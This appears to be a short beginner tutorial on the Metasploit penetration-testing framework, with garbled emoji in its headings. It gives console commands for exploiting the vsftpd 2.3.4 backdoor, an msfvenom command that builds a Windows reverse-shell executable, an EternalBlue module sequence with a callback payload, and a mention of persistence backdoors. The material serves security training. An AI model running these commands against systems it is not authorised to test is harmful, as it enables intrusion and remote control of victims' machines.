What is Metasploit?
Metasploit is an open-source framework used by cybersecurity professionals for identifying, validating, and exploiting vulnerabilities in systems. It provides a powerful environment to create and launch payloads, automate attacks, and perform post-exploitation tasks in a controlled and ethical manner.
๐ฅ Core Capabilities
- Exploit Development and Usage
- Payload Generation and Execution
- Post-Exploitation Modules
- Auxiliary Scanning and Enumeration Tools
- Integration with databases and automation scripts
๐งช Getting Started with Metasploit
Step 1: Launch Metasploit Console
msfconsoleThis command opens the main interactive shell of Metasploit.
Step 2: Search for an Exploit
search vsftpdThis finds all modules related to the vulnerable "vsftpd" service.
Step 3: Use an Exploit
use exploit/unix/ftp/vsftpd_234_backdoorLoads the exploit module into the session.
Step 4: Set Required Options
set RHOSTS 192.168.1.105Defines the target IP address or range.
Step 5: Run the Exploit
exploitLaunches the attack against the specified target.
โ๏ธ Advanced Features
Custom Payloads
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exeGenerates a reverse shell payload to execute on a Windows system.
Persistent Backdoors
Use persistence script in Meterpreter sessions to maintain access.
Database Integration
db_nmap -sV 192.168.1.0/24Scans a network and stores results in the Metasploit database for reference.
๐ Real-World Example: EternalBlue (MS17-010)
This exploit targets a vulnerability in SMB v1 on Windows systems.
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.200
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
exploit๐ก Tips & Best Practices
- Always test exploits in lab environments first
- Use
infoto get full documentation on any module - Save sessions using
sessions -sfor later use - Combine with Nmap, Nikto, and Burp for full attack chains